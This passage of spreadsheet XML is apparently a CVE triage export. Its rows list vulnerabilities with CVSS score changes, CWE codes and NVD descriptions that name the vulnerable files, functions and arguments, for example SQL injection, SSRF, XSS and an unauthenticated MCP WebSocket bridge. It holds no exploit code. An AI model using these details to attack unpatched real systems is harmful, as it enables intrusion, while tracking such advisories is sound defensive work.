          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100902</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100874</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="inlineStr"/>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q438" s="5" t="inlineStr"/>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S438" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This affects an unknown function of the file addnewstudent.php. This manipulation causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100874</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100875</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="inlineStr"/>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q439" s="5" t="inlineStr"/>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S439" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This impacts an unknown function of the file updatedetailsfromfaculty.php. Such manipulation of the argument myfid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100875</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100889</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="inlineStr"/>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q440" s="5" t="inlineStr"/>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-193</t>
        </is>
      </c>
      <c r="S440" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Trusted Domain Project OpenDKIM up to 2.11.0. Affected is the function dkim_qp_decode of the file util.c of the component Decoder. The manipulation results in off-by-one. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100889</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100890</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="inlineStr"/>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q441" s="5" t="inlineStr"/>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="S441" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this vulnerability is the function opendmarc_spf_ipv6_explode in the library libopendmarc/opendmarc_spf.c of the component SPF Parser. This manipulation of the argument cp causes null pointer dereference. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100890</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100892</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="inlineStr"/>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q442" s="5" t="inlineStr"/>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S442" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in aligungr UERANSIM up to 3.3.0. This affects the function ULInformationTransfer of the file src/gnb/rrc/handler.cpp of the component nr-gnb. Performing a manipulation of the argument dedicatedNASMessage results in memory corruption. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100892</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100893</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="inlineStr"/>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S443" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Privoce VoceChat Server up to 0.5.36. This vulnerability affects the function open_graph::fetch of the file src/api/resource.rs of the component open_graphic_parse Endpoint. Executing a manipulation of the argument url can lead to server-side request forgery. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100893</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100895</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="inlineStr"/>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q444" s="5" t="inlineStr"/>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="S444" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Trusted Domain Project OpenARC up to 1.0.0.Beta1. Impacted is the function arc_parse_canon_t in the library libopenarc/arc-canon.c of the component libopenarc. The manipulation results in null pointer dereference. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 1.0.0.Beta0 is recommended to address this issue. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100895</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100901</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="inlineStr"/>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q445" s="5" t="inlineStr"/>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S445" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in athlon1600 youtube-downloader up to 4.0.1. Affected by this vulnerability is the function stream of the file public/stream.php. The manipulation of the argument url results in server-side request forgery. It is possible to launch the attack remotely. The exploit has been made public and could be used. Commit 6ffe823 'better security for public/stream.php' only added CURLOPT_PROTOCOLS http/https restriction and MAXREDIRS cap, does not restrict destination host. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100901</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100903</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="inlineStr"/>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q446" s="5" t="inlineStr"/>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S446" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in ООО НПО Ритм GEOritm up to 2.45.1. This affects an unknown part of the file /restapi/objects/obj-groups of the component REST API. Such manipulation of the argument objectId leads to missing authentication. The attack can be launched remotely. The exploit is publicly available and might be used. Upgrading to version 2.46 is able to mitigate this issue. It is advisable to upgrade the affected component. The vendor confirms: "In August 2026, NPO Ritm received an official vulnerability notification from the Russian Federal Service for Technical and Export Control (FSTEC Russia). The vulnerability was registered under identifier BDU:2026-11235. Following our internal investigation, we confirmed the vulnerability and implemented the necessary security fixes. The vulnerability has been fixed on our hosted GEO.RITM server at geo.ritm.ru. The fix has also been included in GEO.RITM version 2.46, which is already being distributed to our customers."</t>
        </is>
      </c>
      <c r="T446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100903</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100906</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="inlineStr"/>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q447" s="5" t="inlineStr"/>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S447" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Eyeplus 57.0.0.0308. The affected element is the function GetUsers of the file /onvif/Device of the component ONVIF. The manipulation results in information disclosure. The attack can be executed remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="T447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100906</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100909</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="inlineStr"/>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q448" s="5" t="inlineStr"/>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S448" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in OctoberCMS up to 4.1.19/4.2.25/4.3.4. The impacted element is the function getSourcePathForResize of the file modules/system/classes/ResizeImages.php. The manipulation of the argument realSourcePath results in server-side request forgery. The attack may be performed from remote. The exploit has been made public and could be used. Upgrading to version 4.3.5 and 4.4.0 is sufficient to resolve this issue. The patch is identified as 0e9736aa2c6d6bd3d60ff6ef9e0b4d32ce387f58. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100909</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 5.3)</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100868</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="inlineStr"/>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q449" s="5" t="inlineStr"/>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="S449" s="5" t="inlineStr">
        <is>
          <t>Penpot before 2.18.0 binds the MCP server plugin WebSocket bridge to all network interfaces without authentication in single-user mode. Unauthenticated attackers on adjacent networks can connect to the WebSocket port to impersonate the Penpot browser plugin, intercept task payloads, and return forged results to the MCP client.</t>
        </is>
      </c>
      <c r="T449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100868</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.5 → 5.1)</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100904</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="inlineStr"/>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q450" s="5" t="inlineStr"/>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S450" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in amirsanni mini-inventory-and-sales-management-system up to 81bf0b55f5933f3b0dbb1583204a612e06605b95. Impacted is an unknown function of the file application/controllers/Items.php of the component Items Management Module. The manipulation of the argument itemName leads to cross site scripting. Remote exploitation of the attack is possible. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100904</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.1 → 2.3)</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101046</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="inlineStr"/>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q451" s="5" t="inlineStr"/>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S451" s="5" t="inlineStr">
        <is>
          <t>Fleet before 4.89.0 contains an SQL injection vulnerability in the activity list endpoints (GET /api/v1/fleet/activities and GET /api/v1/fleet/hosts/{id}/activities). The deprecated cursor-pagination helper appendListOptionsWithCursorToSQL interpolated the caller-supplied sort/order key into the SQL ORDER BY clause without an allowlist, so an authenticated user with read access to Activity could order results by arbitrary columns. The impact is read-only and bounded to columns on the activity_past table that are not otherwise returned in these responses (e.g. details), allowing their values to be inferred through the resulting sort order; there is no write access, privilege escalation, or reachability of node_key or other host-join columns through these endpoints. Fixed in 4.89.0, which removes the deprecated helper and passes the sort column through SanitizeColumn.</t>
        </is>
      </c>
      <c r="T451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101046</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.1 → 2.3)</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101051</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="inlineStr"/>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr">
        <is>
